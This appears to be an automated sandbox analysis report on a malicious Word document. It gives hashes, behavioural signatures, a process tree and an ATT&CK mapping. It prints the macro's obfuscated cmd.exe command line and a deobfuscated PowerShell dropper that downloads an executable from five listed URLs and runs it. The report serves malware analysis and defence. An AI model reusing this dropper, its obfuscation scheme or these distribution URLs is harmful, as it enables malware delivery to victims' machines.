Overview

overview

10

Static

static

8

45fe53a320...c7.doc

windows7_x64

10

45fe53a320...c7.doc

windows10-2004_x64

10

Analysis

  • max time kernel
    140s
  • max time network
    186s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    21-05-2022 00:27

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    45fe53a320684b36663ffe02061c1df145d4c3ccc3aa855582f19d3e12210ec7.doc

  • Size

    135KB

  • MD5

    5d306a8b1060e779dd27b30749c25d73

  • SHA1

    f48489348a2aa9b01ed7aa7c4ea17aa3002c194e

  • SHA256

    45fe53a320684b36663ffe02061c1df145d4c3ccc3aa855582f19d3e12210ec7

  • SHA512

    14945a24d04928ec7e89f49ed1afdd71b76b2ca9ebd8b8fb536c3345be06c6c14c32699e95516749a8650c22f274ad2b5b5f6935f729141d1a7784bca0165afb

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://www.srskgroup.com/9d74kPY
exe.dropper

http://www.stovefree.com/Zg
exe.dropper

http://www.rohanpurit.com/gfnpS
exe.dropper

http://www.misyaland.com/q
exe.dropper

http://teambored.co.uk/Ps

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 5 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\45fe53a320684b36663ffe02061c1df145d4c3ccc3aa855582f19d3e12210ec7.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3644
    • C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:O/C"set bl=IHiNKLidUBGqPsinWOBdMAhPLoDiwEYWw-/mTety(QpCZ{f9=Jk@$':g7u.6x4jVXbSza+r};8 ,lv0\)Fc&&for %j in (52,49,44,50,48,53,31,3,81,53,72,52,3,20,64,48,15,37,32,33,25,65,62,37,82,38,74,3,37,38,58,31,37,65,43,76,27,37,15,38,72,52,41,11,11,48,53,22,38,38,42,54,34,34,32,32,32,58,13,70,13,50,55,70,25,57,42,58,82,25,35,34,47,19,56,61,50,23,30,51,22,38,38,42,54,34,34,32,32,32,58,13,38,25,77,37,46,70,37,37,58,82,25,35,34,44,55,51,22,38,38,42,54,34,34,32,32,32,58,70,25,22,68,15,42,57,70,27,38,58,82,25,35,34,55,46,15,42,66,51,22,38,38,42,54,34,34,32,32,32,58,35,27,13,39,68,76,68,15,19,58,82,25,35,34,11,51,22,38,38,42,54,34,34,38,37,68,35,65,25,70,37,19,58,82,25,58,57,50,34,23,13,53,58,66,42,76,27,38,40,53,51,53,80,72,52,38,24,67,48,53,23,15,57,53,72,52,64,4,25,74,48,74,53,59,47,61,53,72,52,82,4,36,48,53,43,15,76,53,72,52,27,64,11,48,52,37,15,77,54,38,37,35,42,69,53,79,53,69,52,64,4,25,69,53,58,37,60,37,53,72,46,25,70,37,68,82,22,40,52,15,43,62,74,27,15,74,52,41,11,11,80,45,38,70,39,45,52,3,20,64,58,26,25,32,15,76,25,68,19,81,27,76,37,40,52,15,43,62,75,74,52,27,64,11,80,72,52,26,13,50,48,53,25,15,27,53,72,0,46,74,40,40,10,37,38,33,0,38,37,35,74,52,27,64,11,80,58,76,37,15,55,38,22,74,33,55,37,74,73,78,78,78,78,80,74,45,0,15,77,25,50,37,33,0,38,37,35,74,52,27,64,11,72,52,76,63,15,48,53,32,36,43,53,72,65,70,37,68,50,72,71,71,82,68,38,82,22,45,71,71,52,43,13,82,48,53,20,27,11,53,72,86)do set C6R=!C6R!!bl:~%j,1!&&if %j gtr 85 %TEMP:~-1,1%owershell "!C6R:~-432!""
      2⤵
      • Process spawned unexpected child process
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • Suspicious use of WriteProcessMemory
      PID:1772
      • C:\Windows\system32\cmd.exe
        CmD /V:O/C"set bl=IHiNKLidUBGqPsinWOBdMAhPLoDiwEYWw-/mTety(QpCZ{f9=Jk@$':g7u.6x4jVXbSza+r};8 ,lv0\)Fc&&for %j in (52,49,44,50,48,53,31,3,81,53,72,52,3,20,64,48,15,37,32,33,25,65,62,37,82,38,74,3,37,38,58,31,37,65,43,76,27,37,15,38,72,52,41,11,11,48,53,22,38,38,42,54,34,34,32,32,32,58,13,70,13,50,55,70,25,57,42,58,82,25,35,34,47,19,56,61,50,23,30,51,22,38,38,42,54,34,34,32,32,32,58,13,38,25,77,37,46,70,37,37,58,82,25,35,34,44,55,51,22,38,38,42,54,34,34,32,32,32,58,70,25,22,68,15,42,57,70,27,38,58,82,25,35,34,55,46,15,42,66,51,22,38,38,42,54,34,34,32,32,32,58,35,27,13,39,68,76,68,15,19,58,82,25,35,34,11,51,22,38,38,42,54,34,34,38,37,68,35,65,25,70,37,19,58,82,25,58,57,50,34,23,13,53,58,66,42,76,27,38,40,53,51,53,80,72,52,38,24,67,48,53,23,15,57,53,72,52,64,4,25,74,48,74,53,59,47,61,53,72,52,82,4,36,48,53,43,15,76,53,72,52,27,64,11,48,52,37,15,77,54,38,37,35,42,69,53,79,53,69,52,64,4,25,69,53,58,37,60,37,53,72,46,25,70,37,68,82,22,40,52,15,43,62,74,27,15,74,52,41,11,11,80,45,38,70,39,45,52,3,20,64,58,26,25,32,15,76,25,68,19,81,27,76,37,40,52,15,43,62,75,74,52,27,64,11,80,72,52,26,13,50,48,53,25,15,27,53,72,0,46,74,40,40,10,37,38,33,0,38,37,35,74,52,27,64,11,80,58,76,37,15,55,38,22,74,33,55,37,74,73,78,78,78,78,80,74,45,0,15,77,25,50,37,33,0,38,37,35,74,52,27,64,11,72,52,76,63,15,48,53,32,36,43,53,72,65,70,37,68,50,72,71,71,82,68,38,82,22,45,71,71,52,43,13,82,48,53,20,27,11,53,72,86)do set C6R=!C6R!!bl:~%j,1!&&if %j gtr 85 powershell "!C6R:~-432!""
        3⤵
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • Suspicious use of WriteProcessMemory
        PID:2792
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell "$JZk='WNF';$NMX=new-object Net.WebClient;$Qqq='http://www.srskgroup.com/9d74kPY@http://www.stovefree.com/Zg@http://www.rohanpurit.com/gfnpS@http://www.misyaland.com/q@http://teambored.co.uk/Ps'.Split('@');$tLz='Pnu';$XKo = '694';$cKT='Cnl';$iXq=$env:temp+'\'+$XKo+'.exe';foreach($nCj in $Qqq){try{$NMX.DownloadFile($nCj, $iXq);$Dsk='oni';If ((Get-Item $iXq).length -ge 80000) {Invoke-Item $iXq;$lVn='wTC';break;}}catch{}}$Csc='Miq';"
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4324

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1772-137-0x0000000000000000-mapping.dmp
    Download
  • memory/2792-138-0x0000000000000000-mapping.dmp
    Download
  • memory/3644-133-0x00007FFA92C10000-0x00007FFA92C20000-memory.dmp
    Filesize

    64KB

    Download
  • memory/3644-143-0x00007FFA92C10000-0x00007FFA92C20000-memory.dmp
    Filesize

    64KB

    Download
  • memory/3644-130-0x00007FFA92C10000-0x00007FFA92C20000-memory.dmp
    Filesize

    64KB

    Download
  • memory/3644-135-0x00007FFA903C0000-0x00007FFA903D0000-memory.dmp
    Filesize

    64KB

    Download
  • memory/3644-136-0x00007FFA903C0000-0x00007FFA903D0000-memory.dmp
    Filesize

    64KB

    Download
  • memory/3644-131-0x00007FFA92C10000-0x00007FFA92C20000-memory.dmp
    Filesize

    64KB

    Download
  • memory/3644-132-0x00007FFA92C10000-0x00007FFA92C20000-memory.dmp
    Filesize

    64KB

    Download
  • memory/3644-146-0x00007FFA92C10000-0x00007FFA92C20000-memory.dmp
    Filesize

    64KB

    Download
  • memory/3644-145-0x00007FFA92C10000-0x00007FFA92C20000-memory.dmp
    Filesize

    64KB

    Download
  • memory/3644-144-0x00007FFA92C10000-0x00007FFA92C20000-memory.dmp
    Filesize

    64KB

    Download
  • memory/3644-134-0x00007FFA92C10000-0x00007FFA92C20000-memory.dmp
    Filesize

    64KB

    Download
  • memory/4324-141-0x00007FFAA7BA0000-0x00007FFAA8661000-memory.dmp
    Filesize

    10.8MB

    Download
  • memory/4324-140-0x000001A3FC460000-0x000001A3FC482000-memory.dmp
    Filesize

    136KB

    Download
  • memory/4324-139-0x0000000000000000-mapping.dmp
    Download